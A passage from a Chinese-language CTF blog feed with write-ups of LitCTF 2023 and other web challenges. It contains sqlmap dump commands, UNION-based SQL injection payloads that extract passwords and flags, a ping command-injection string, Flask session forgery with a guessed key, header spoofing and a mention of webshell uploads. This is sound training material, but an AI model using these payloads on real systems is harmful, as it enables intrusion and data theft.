class="hljs-number">1</span>.txt<br></code></pre></td></tr></table></figure><p>查数据库</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">python3 sqlmap<span class="hljs-selector-class">.py</span> -r <span class="hljs-number">1</span><span class="hljs-selector-class">.txt</span> -dbs <span class="hljs-attr">--batch</span><br></code></pre></td></tr></table></figure><p>查表</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">python3 sqlmap<span class="hljs-selector-class">.py</span> -r <span class="hljs-number">1</span><span class="hljs-selector-class">.txt</span> -D school -tables <span class="hljs-attr">--batch</span><br></code></pre></td></tr></table></figure><p>查字段</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">python3 sqlmap<span class="hljs-selector-class">.py</span> -r <span class="hljs-number">1</span><span class="hljs-selector-class">.txt</span> -D school -T students <span class="hljs-attr">--columns</span> <span class="hljs-attr">--batch</span><br></code></pre></td></tr></table></figure><p>查数据</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">python3 sqlmap<span class="hljs-selector-class">.py</span> -r <span class="hljs-number">1</span><span class="hljs-selector-class">.txt</span> -D school -T students -C name <span class="hljs-attr">--dump</span> <span class="hljs-attr">--batch</span><br></code></pre></td></tr></table></figure><p>当请求延时的时候使用–delay 1</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">python3 sqlmap<span class="hljs-selector-class">.py</span> -r <span class="hljs-number">1</span><span class="hljs-selector-class">.txt</span> -dbs <span class="hljs-attr">--batch</span> <span class="hljs-attr">--delay</span> <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><h2 id="session伪造"><a href="#session伪造" class="headerlink" title="session伪造"></a>session伪造</h2><h2 id="md5弱比较,强比较"><a href="#md5弱比较,强比较" class="headerlink" title="md5弱比较,强比较"></a>md5弱比较,强比较</h2><p>知识点:[【PHP】MD5比较漏洞 弱比较、强比较、强碰撞_md5字符串qnkcdzo与s_小 白 萝 卜的博客-CSDN博客](<a href="https://blog.csdn.net/EC_Carrot/article/details/109525162#:~:text=%E5%BC%B1%E6%AF%94%E8%BE%83">https://blog.csdn.net/EC_Carrot/article/details/109525162#:~:text=弱比较</a> if(%24_POST[‘a’]!%3D%24_POST[‘b’]%26%26,md5(%24_POST[‘a’])%3D%3Dmd5(%24_POST[‘b’])){ die(“success!”)%3B })</p><p><a href="https://blog.csdn.net/q20010619/article/details/109856150">CTF中的md5弱类型(ALL_IN_ONE)_ctf all in one_OceanSec的博客-CSDN博客</a></p><p>例题:[<a href="https://www.nssctf.cn/problem/2076">NSSCTF 2022 Spring Recruit]babyphp | NSSCTF</a></p><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">include_once</span>(<span class="hljs-string">'flag.php'</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'a'</span>])&&!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">'/[0-9]/'</span>,<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'a'</span>])&&<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'a'</span>])){<br> <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b1'</span>])&&<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b2'</span>]){<br> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b1'</span>]!=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b2'</span>]&&<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b1'</span>])===<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'b2'</span>])){<br> <span class="hljs-keyword">if</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c1'</span>]!=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c2'</span>]&&<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c1'</span>])&&<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c2'</span>])&&<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c1'</span>])==<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'c2'</span>])){<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"yee"</span>;<br> }<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"nop"</span>;<br> }<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"go on"</span>;<br> }<br>}<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"let's get some php"</span>;<br>}<br><span class="hljs-meta">?></span> <br></code></pre></td></tr></table></figure><p>我们可以看到他一共是有三层比较,我们需要一层一层的绕过</p><p>第一层的意思是</p><ul><li>“a” 字段存在。</li><li>“a” 字段的值不包含数字字符。</li><li>“a” 字段的值可以转换为一个非零的整数。</li></ul><p>我们就可以使用数组的形式,来绕过他的判断,数组的hash他是不会输出hash值的,所以不管什么值都是真确</p><p>第二层就是输入b1和b2,进行md5强比较</p><p>也可以直接使用数组的方式绕过</p><p>第三层是md5弱比较,我们直接采用那些字符转换md5会变成0e开头的就可以了</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6gwbpclsays0.webp" alt="image-20230923170343632"></p>]]></content>
<summary type="html"><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/202308172151534.jpg"></p></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="Web" scheme="https://shenshuoyaoyouguangha.github.io/tags/Web/"/>
</entry>
<entry>
<title>litctf</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/09/19/litctf/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/09/19/litctf/</id>
<published>2023-09-19T08:45:20.000Z</published>
<updated>2023-12-18T05:25:30.601Z</updated>
<content type="html"><![CDATA[<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><p><img src="/./../image/image-20231218132527404.png" alt="image-20231218132527404"></p><h2 id="LitCTF-2023-我Flag呢?"><a href="#LitCTF-2023-我Flag呢?" class="headerlink" title="[LitCTF 2023]我Flag呢?"></a>[LitCTF 2023]我Flag呢?</h2><p>打开环境后,直接F12就可以看到flag</p><p>同时打开源码的方式还有</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">f12<span class="hljs-regexp">/ctrl+u/</span>view-<span class="hljs-keyword">source</span>:<br></code></pre></td></tr></table></figure><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/%7B4038CD4C-5AD6-45cc-B79F-734765D74244%7D.74m3u0jfzps0.webp"></p><span id="more"></span> <h2 id="LitCTF-2023-PHP是世界上最好的语言!!"><a href="#LitCTF-2023-PHP是世界上最好的语言!!" class="headerlink" title="[LitCTF 2023]PHP是世界上最好的语言!!"></a>[LitCTF 2023]PHP是世界上最好的语言!!</h2><p>打开页面,猜测命令执行</p><p>system(“ls /“); 查看目录文件夹,看到flag文件直接查看即可</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.4m4th4lnkqg0.png"></p><h2 id="LitCTF-2023-就当无事发生"><a href="#LitCTF-2023-就当无事发生" class="headerlink" title="[LitCTF 2023]就当无事发生"></a>[LitCTF 2023]就当无事发生</h2><p>首先去探姬的github,然后直接搜索他的博客地址</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/0bc762429c6478832b423983f5f49c8e.2fr8flw6sa80.webp"></p><p>随后直接点击这个按钮,可以查看作者对文件的更改</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2r551bvk57c0.webp"></p><p>最后在里面找到带有X号的,就是作者删除过的,或者点上面的√可以看到作者的更改</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/%7B7E1532FA-9E7A-4e87-A5FE-C4EB552A98AF%7D.112w5kxubstc.webp"></p><h2 id="LitCTF-2023-Follow-me-and-hack-me"><a href="#LitCTF-2023-Follow-me-and-hack-me" class="headerlink" title="[LitCTF 2023]Follow me and hack me"></a>[LitCTF 2023]Follow me and hack me</h2><p>直接hackar进行传参</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/8160496c03f53fa83615d0212465ef11.12lqjzm7lqf4.webp"></p><h2 id="LitCTF-2023-Vim-yyds"><a href="#LitCTF-2023-Vim-yyds" class="headerlink" title="[LitCTF 2023]Vim yyds"></a>[LitCTF 2023]Vim yyds</h2><p>xxxxxxxxxx mappings = { 0x04:”A”, 0x05:”B”, 0x06:”C”, 0x07:”D”, 0x08:”E”, 0x09:”F”, 0x0A:”G”, 0x0B:”H”, 0x0C:”I”, 0x0D:”J”, 0x0E:”K”, 0x0F:”L”, 0x10:”M”, 0x11:”N”,0x12:”O”, 0x13:”P”, 0x14:”Q”, 0x15:”R”, 0x16:”S”, 0x17:”T”, 0x18:”U”,0x19:”V”, 0x1A:”W”, 0x1B:”X”, 0x1C:”Y”, 0x1D:”Z”, 0x1E:”1”, 0x1F:”2”, 0x20:”3”, 0x21:”4”, 0x22:”5”, 0x23:”6”, 0x24:”7”, 0x25:”8”, 0x26:”9”, 0x27:”0”, 0x28:”\n”, 0x2a:”[DEL]”, 0X2B:” “, 0x2C:” “, 0x2D:”-“, 0x2E:”=”, 0x2F:”[“, 0x30:”]”, 0x31:”\“, 0x32:”~”, 0x33:”;”, 0x34:”‘“, 0x36:”,”, 0x37:”.” }nums = []keys = open(‘usbdata.txt’)for line in keys: if line[0]!=’0’ or line[1]!=’0’ or line[3]!=’0’ or line[4]!=’0’ or line[9]!=’0’ or line[10]!=’0’ or line[12]!=’0’ or line[13]!=’0’ or line[15]!=’0’ or line[16]!=’0’ or line[18]!=’0’ or line[19]!=’0’ or line[21]!=’0’ or line[22]!=’0’: continue nums.append(int(line[6:8],16))keys.close()output = “”for n in nums: if n == 0 : continue if n in mappings: output += mappings[n] else: output += ‘[unknown]’print(‘output :\n’ + output)# output :# SEC2ETK3YPython</p><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">vim</span> -r xxx.swp<br></code></pre></td></tr></table></figure><p>比如我 vim 1.php 但是我中通关闭了他,那天就会产生这个文件,只需要r一下就可以恢复</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/15250cfd706242cbaf0aa0e5a8f97bab.67gq0p6qvn40.webp"></p><p>回到题目,首先下载下这个文件,然后去kali将文件恢复</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">node4<span class="hljs-selector-class">.anna</span><span class="hljs-selector-class">.nssctf</span><span class="hljs-selector-class">.cn</span>:<span class="hljs-number">28647</span>/<span class="hljs-selector-class">.index</span><span class="hljs-selector-class">.php</span>.swp<br></code></pre></td></tr></table></figure><p>此时我们就已知了他的php代码</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6pidz6qpuog0.webp"></p><p>代码的逻辑很简单,就是post传参一个base64加密后的’Give_Me_You_Flag’</p><p>然后传入一个名为cmd的参数,因为外包裹着eval,所以我们可以执行命令</p><p>可以用burp进行抓包操作得到flag</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.28caqntwhedc.webp"></p><h2 id="LitCTF-2023-这是什么?SQL-!注一下-!"><a href="#LitCTF-2023-这是什么?SQL-!注一下-!" class="headerlink" title="[LitCTF 2023]这是什么?SQL !注一下 !"></a>[LitCTF 2023]这是什么?SQL !注一下 !</h2><p><a href="https://www.bilibili.com/video/BV1ZR4y1Y745/?spm_id_from=333.880.my_history.page.click&vd_source=c195ba0f6cdc7f783321bd952f37fd18">SQL注入攻击原理,方法和类型_哔哩哔哩_bilibili</a></p><p><a href="https://blog.csdn.net/A951860555/article/details/116484328">SQL注入的一般过程_sql注入过程___lifanxin的博客-CSDN博客</a></p><p>作为一个新手web,看了一天,看不懂一点,所以直接记套题,后续慢慢了解</p><p>但我可以解释一下每个命令的作用</p><p>首先先id=1,先判断是字符型注入还是整形注入</p><p>id=1回显就是整形</p><p>id=’1‘回显就是字符型</p><p>可以看到id=1时有回显,我们判断他是整形注入</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2pssl53e6kq0.webp"></p><p><a href="https://blog.csdn.net/qq_23667585/article/details/127213099">浅谈SQL注入中的-1‘ union select 1,2,3#_娄不夜的博客-CSDN博客</a></p><p>1.先判断显示位,payload</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">-<span class="hljs-number">1</span>)))))) union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>第一句就有很多问题,详细可以参考上述的文章,wp参考</p><p>[<a href="https://blog.csdn.net/Leaf_initial/article/details/130671885">LitCTF2023] web方向全题解wp_Leafzzz__的博客-CSDN博客</a></p><p>2.爆库:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata#<br></code></pre></td></tr></table></figure><p>1=2的目的是使得条件为假,经过我的实验使用id=-1)))))) union…同理,所以这俩的作用都是表示判断错误,不显示第一个数据库,显示第二个</p><p>3.得到库名</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">information_schema,mysql,ctftraining,performance_schema,test,ctf<br></code></pre></td></tr></table></figure><p>4.爆表:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(table_name)<span class="hljs-keyword">from</span> information_schema.tables where table_schema=<span class="hljs-string">"ctf"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>5.得到表名:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">users<br></code></pre></td></tr></table></figure><p>6.爆列:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(column_name)<span class="hljs-keyword">from</span> information_schema.columns where table_name=<span class="hljs-string">"users"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>7.得到列名:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password<br></code></pre></td></tr></table></figure><p>8.获取值:</p><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,group_concat(<span class="hljs-keyword">password</span>) <span class="hljs-keyword">from</span> ctf.users#<br></code></pre></td></tr></table></figure><p>9.获得彩蛋(难蚌):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">OHHHHHHH,F1rst_to_Th3_eggggggggg!} <br></code></pre></td></tr></table></figure><p>flag同理,去爆ctftraining即可</p><p>10.重新爆表:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(table_name)<span class="hljs-keyword">from</span> information_schema.tables where table_schema=<span class="hljs-string">"ctftraining"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>11.得到表明:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">flag,news,users<br></code></pre></td></tr></table></figure><p>12.重新爆列:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(column_name)<span class="hljs-keyword">from</span> information_schema.columns where table_name=<span class="hljs-string">"flag"</span><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p>13.获得列名:</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">flag</span><br></code></pre></td></tr></table></figure><p>14.重新获取值:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1</span>)))))) <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span> union select <span class="hljs-number">1</span>,<span class="hljs-title function_ invoke__">group_concat</span>(flag) <span class="hljs-keyword">from</span> ctftraining.flag<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2vs4use82qa0.webp"></p><h4 id="webshell:需要上传木马以及蚁剑的使用"><a href="#webshell:需要上传木马以及蚁剑的使用" class="headerlink" title="webshell:需要上传木马以及蚁剑的使用"></a>webshell:需要上传木马以及蚁剑的使用</h4><p>大马,小马,一句话木马等,上传后使用蚁剑进行连接</p><p><a href="https://www.bilibili.com/video/BV1Wk4y1m7fp/?spm_id_from=333.337.search-card.all.click&vd_source=c195ba0f6cdc7f783321bd952f37fd18">如何使用中国蚁剑连接webshell?_哔哩哔哩_bilibili</a></p><h2 id="LitCTF-2023-Http-pro-max-plus"><a href="#LitCTF-2023-Http-pro-max-plus" class="headerlink" title="[LitCTF 2023]Http pro max plus"></a>[LitCTF 2023]Http pro max plus</h2><p>和http请求头有关的题目,详细可以在下面的网站了解</p><p><a href="https://developer.mozilla.org/zh-CN/docs/web/http/headers">HTTP 标头(header) - HTTP | MDN (mozilla.org)</a></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php">X-Forwarded: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Forwarded-For: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Forwarded-For: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Forwarded: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Requested-With: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Forwarded-Proto: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Forwarded-Host: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-remote-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-remote-addr: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>True-Client-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Client-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Client-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Real-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Ali-CDN-Real-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Cdn-Src-Ip: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Cdn-Real-Ip: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>CF-Connecting-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Cluster-Client-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>WL-Proxy-Client-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Proxy-Client-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>Fastly-Client-Ip: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>True-Client-Ip: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Originating-IP: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Host: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br>X-Custom-IP-Authorization: <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br></code></pre></td></tr></table></figure><p>本机地址client-ip: 127.0.0.1</p><p>访问网站referer: pornhub.com</p><p>指定浏览器user-agent: Chrome</p><p>使用代理via: Clash.win</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.73yrqln52y00.webp"></p><p>到达这个页面后,直接去源码查看就可以看到flag所在的地方</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3xfl93ctnwu0.webp"></p><h2 id="LitCTF-2023-1zjs"><a href="#LitCTF-2023-1zjs" class="headerlink" title="[LitCTF 2023]1zjs"></a>[LitCTF 2023]1zjs</h2><p>直接去源代码区域,找到js源码,可以发现一个php,里面有很多jsfuck的文字,直接去解密就行</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1rcn1dvd618g.webp"></p><p>因为是js,可以在控制台直接输出</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.4yqn0mb2fi00.webp"></p><h2 id="LitCTF-2023-Flag点击就送!"><a href="#LitCTF-2023-Flag点击就送!" class="headerlink" title="[LitCTF 2023]Flag点击就送!"></a>[LitCTF 2023]Flag点击就送!</h2><p>session伪造的题目</p><p>我们可以先尝试输入文字然后回车,到后面获取flag,然后他提示我们需要管理员才能获取flag</p><p>通过burp抓包我们可以看到有一段cookie被返回,题目的要求是只有管理员才能拿flag</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.61623zag7co0.png"></p><p>session伪造需要一个key,一般的题目中key是需要在题目中找的,但是这个题目的key是猜的,key=’litctf’</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">解码:python3 flask_session_cookie_manager3.py decode -s <span class="hljs-string">"密钥"</span> -c <span class="hljs-string">"session"</span><br><br>加密:python3 flask_session_cookie_manager3.py encode -s <span class="hljs-string">"密钥"</span> -t <span class="hljs-string">"上面解密出的一串字符串"</span><br></code></pre></td></tr></table></figure><p>我们获取了key后可以先去解密一下,我们发现解密后他的请求name为’111’,根据题目我们修改成’admin’,就可以了</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.27nvnjo9nyo0.webp"></p><p>我们使用burp发送过去就可以获得flag</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.2eee9dgxxog0.webp"></p><h2 id="LitCTF-2023-Ping"><a href="#LitCTF-2023-Ping" class="headerlink" title="[LitCTF 2023]Ping"></a>[LitCTF 2023]Ping</h2><p>我们首先可以看到源码,里面有个正则</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.64n0c8tf0240.webp"></p><p>所以我们有两个方式,第一个就是直接禁用JavaScript即可</p><p>F12+F1 禁用后直接 1.1.1.1 || (ls /)(cat /flag) 即可</p><p>同时这里就涉及了一个知识点就是linux的管道命令</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><span class="hljs-meta">& 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server &</span><br><br><span class="hljs-meta">&& 表示前一条命令执行成功时,才执行后一条命令 ,如 echo '1‘ && echo '2' </span><br><br><span class="hljs-string">| 表示管道,上一条命令的输出,作为下一条命令参数,如 echo 'yes' | wc -l</span><br><br><span class="hljs-string">|| 表示上一条命令执行失败后,才执行下一条命令,如 cat nofile || echo "</span>fail<span class="hljs-string">"</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.7fx5n2h64yo0.webp"></p><p>第二个方法就是使用burp进行抓包,抓到后之间在内部进行修改</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1g5mkbhr9g5c.webp"></p>]]></content>
<summary type="html"><h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><p><img src="/./../image/image-20231218132527404.png" alt="image-20231218132527404"></p>
<h2 id="LitCTF-2023-我Flag呢?"><a href="#LitCTF-2023-我Flag呢?" class="headerlink" title="[LitCTF 2023]我Flag呢?"></a>[LitCTF 2023]我Flag呢?</h2><p>打开环境后,直接F12就可以看到flag</p>
<p>同时打开源码的方式还有</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">f12<span class="hljs-regexp">/ctrl+u/</span>view-<span class="hljs-keyword">source</span>:<br></code></pre></td></tr></table></figure>
<p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/%7B4038CD4C-5AD6-45cc-B79F-734765D74244%7D.74m3u0jfzps0.webp"></p></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="Pwn" scheme="https://shenshuoyaoyouguangha.github.io/tags/Pwn/"/>
<category term="RE" scheme="https://shenshuoyaoyouguangha.github.io/tags/RE/"/>
<category term="litctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/litctf/"/>
<category term="WEB" scheme="https://shenshuoyaoyouguangha.github.io/tags/WEB/"/>
</entry>
<entry>
<title>山石结营赛</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/08/20/%E5%B1%B1%E7%9F%B3%E7%BB%93%E8%90%A5%E8%B5%9B/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/08/20/%E5%B1%B1%E7%9F%B3%E7%BB%93%E8%90%A5%E8%B5%9B/</id>
<published>2023-08-19T16:15:19.000Z</published>
<updated>2023-08-19T17:21:58.329Z</updated>
